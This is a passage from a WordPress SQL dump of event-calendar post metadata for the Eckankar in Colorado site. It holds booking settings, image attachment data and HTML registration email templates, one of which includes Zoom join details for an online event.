_start_day_seconds','37800'),(167852,267037,'mec_end_date','2022-09-25'),(167853,267037,'mec_end_time_hour','11'),(167854,267037,'mec_end_time_minutes','30'),(167855,267037,'mec_end_time_ampm','AM'),(167856,267037,'mec_end_day_seconds','41400'),(167857,267037,'mec_repeat_status','0'),(167858,267037,'mec_repeat_type',''),(167859,267037,'mec_repeat_interval','1'),(167860,267037,'mec_repeat_end',''),(167861,267037,'mec_repeat_end_at_occurrences',''),(167862,267037,'mec_repeat_end_at_date',''),(167863,267037,'mec_advanced_days','a:0:{}'),(167864,267037,'mec_in_days',''),(167865,267037,'mec_not_in_days',''),(167866,267037,'mec_hourly_schedules','a:0:{}'),(167867,267037,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(167868,267037,'mec_tickets','a:0:{}'),(167869,267037,'mec_fees_global_inheritance','1'),(167870,267037,'mec_fees','a:0:{}'),(167871,267037,'mec_ticket_variations_global_inheritance','1'),(167872,267037,'mec_ticket_variations','a:0:{}'),(167873,267037,'mec_reg_fields_global_inheritance','1'),(167874,267037,'mec_reg_fields','a:0:{}'),(167875,267037,'mec_bfixed_fields','a:0:{}'),(167876,267037,'mec_op','a:0:{}'),(167877,267037,'mec_fields','a:0:{}'),(167878,267037,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(167879,267037,'mec_event_status','EventScheduled'),(167880,267037,'mec_moved_online_link',''),(167881,267037,'mec_cancelled_reason',''),(167882,267037,'mec_display_cancellation_reason_in_single_page',''),(167883,267037,'protect_children',''),(167884,267037,'passster_activate_global_protection',NULL),(167885,267037,'passster_activate_protection',NULL),(167886,267037,'passster_protection_type','password'),(167887,267037,'boldgrid_hide_page_title','0'),(167888,267037,'_thumbnail_id','267038'),(167891,267037,'_dp_original','266311'),(167890,267037,'boldgrid_in_page_containers','1'),(167892,267037,'_edit_lock','1660675888:2'),(167893,267037,'_edit_last','2'),(167894,267038,'_wp_attached_file','2022/08/hummingbird-flower-1.jpg'),(167895,267038,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:768;s:6:\"height\";i:432;s:4:\"file\";s:32:\"2022/08/hummingbird-flower-1.jpg\";s:8:\"filesize\";i:81084;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"hummingbird-flower-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16085;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"hummingbird-flower-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8482;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:32:\"hummingbird-flower-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25205;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:32:\"hummingbird-flower-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37248;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:32:\"hummingbird-flower-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27017;}s:8:\"tileview\";a:5:{s:4:\"file\";s:32:\"hummingbird-flower-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30312;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(167896,267038,'original-file','2022/08/hummingbird-flower-1-updraft-pre-smush-original.jpg'),(167897,267038,'smush-complete','1'),(167898,267038,'smush-info','The file was compressed from 79.18 KB to 75.86 KB saving 4.19 percent using WP-Optimize'),(167899,267038,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:81084;s:12:\"smushed-size\";i:77685;s:15:\"savings-percent\";d:4.19;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:81084;s:10:\"compressed\";i:77685;}s:6:\"medium\";a:2:{s:8:\"original\";i:16085;s:10:\"compressed\";i:15856;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8482;s:10:\"compressed\";i:8416;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:25205;s:10:\"compressed\";i:24847;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:37248;s:10:\"compressed\";i:36605;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:27017;s:10:\"compressed\";i:26621;}s:8:\"tileview\";a:2:{s:8:\"original\";i:30312;s:10:\"compressed\";i:29897;}}}'),(167911,267041,'mec_additional_location_ids','a:0:{}'),(167912,267041,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-09-04\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-09-04\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(167913,267041,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(167914,267041,'mec_certain_weekdays','a:0:{}'),(167915,267041,'mec_allday','0'),(167916,267041,'one_occurrence','0'),(167917,267041,'mec_hide_time','0'),(167918,267041,'mec_hide_end_time','0'),(167919,267041,'mec_comment',''),(167920,267041,'mec_timezone','global'),(167921,267041,'mec_countdown_method','global'),(167922,267041,'mec_public','1'),(167923,267041,'mec_start_date','2022-09-04'),(167924,267041,'mec_start_time_hour','10'),(167925,267041,'mec_start_time_minutes','30'),(167926,267041,'mec_start_time_ampm','AM'),(167927,267041,'mec_start_day_seconds','37800'),(167928,267041,'mec_end_date','2022-09-04'),(167929,267041,'mec_end_time_hour','11'),(167930,267041,'mec_end_time_minutes','30'),(167931,267041,'mec_end_time_ampm','AM'),(167932,267041,'mec_end_day_seconds','41400'),(167933,267041,'mec_repeat_status','0'),(167934,267041,'mec_repeat_type',''),(167935,267041,'mec_repeat_interval','1'),(167936,267041,'mec_repeat_end',''),(167937,267041,'mec_repeat_end_at_occurrences',''),(167938,267041,'mec_repeat_end_at_date',''),(167939,267041,'mec_advanced_days','a:0:{}'),(167940,267041,'mec_in_days',''),(167941,267041,'mec_not_in_days',''),(167942,267041,'mec_hourly_schedules','a:0:{}'),(167943,267041,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(167944,267041,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:32:\"Experience HU, The Sound of Soul\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"AM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(167945,267041,'mec_fees_global_inheritance','1'),(167946,267041,'mec_fees','a:0:{}'),(167947,267041,'mec_ticket_variations_global_inheritance','1'),(167948,267041,'mec_ticket_variations','a:0:{}'),(167949,267041,'mec_reg_fields_global_inheritance','1'),(167950,267041,'mec_reg_fields','a:0:{}'),(167951,267041,'mec_bfixed_fields','a:0:{}'),(167952,267041,'mec_op','a:0:{}'),(167953,267041,'mec_fields','a:0:{}'),(167954,267041,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9904:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  